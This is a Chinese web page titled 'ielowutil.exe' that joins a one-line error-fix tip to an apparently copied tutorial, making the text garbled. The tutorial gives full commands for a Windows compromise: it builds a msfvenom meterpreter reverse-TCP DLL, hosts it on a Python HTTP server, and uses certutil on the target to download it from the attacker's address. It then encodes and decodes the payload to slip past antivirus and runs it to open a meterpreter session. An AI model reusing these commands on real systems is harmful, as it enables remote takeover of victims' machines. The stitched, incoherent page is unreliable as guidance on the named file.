ielowutil.exe

前沿拓展:

ielowutil.exe

应用程序错误解法:
1.检查电脑是否存在**,请使用百度卫士进行木马查杀。

还是使用 msfvenom 工具为与攻击机器的反向TCP连接生成有效负载。有效负载的格式在动态链接库文件 .dll 中设置。命名为 dll.txt。成功执行后,将在 root 目录中创建文件。现在,要传输该文件,我们可以使用 Python One-liner 生成的 HTTP Server。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.51 lport=1234 -f dll > dll.txt
python -m SimpleHTTPServer 80

有效负载已托管在服务器上,在靶机上执行有效负载之前,我们需要在攻击计算机上启动**,以捕获在有效负载执行后将生成的会话。

ielowutil.exe

成功启动攻击者的**之后再进入靶机。打开 PowerShell 终端。我们需要将有效负载下载到这台机器上,并且必须谨慎进行。执行命令:

certutil -urlcache -split -f http://192.168.1.51/dll.txt dll.txt | certutil -encode dll.txt edll.txt

该文件将被下载为文本文件,并被编码为另一个文本文件。

现在要执行有效载荷以损害受害者,我们必须对其进行解码。使用 -decode 参数解码有效负载并将其保存为 exploit.dll(杀毒软件不会察觉)。第二运行此 DLL。

ielowutil.exe

回到攻击机器,以查看我们的**生成并捕获 meterpreter 的实例。运行 sysinfo 以查看目标系统的详细信息。

ielowutil.exe

成功使用 Certutil 和恶意编码的可执行文件 Getshell。

拓展知识:

原创文章,作者:九贤生活小编,如若转载,请注明出处:http://www.wangguangwei.com/23772.html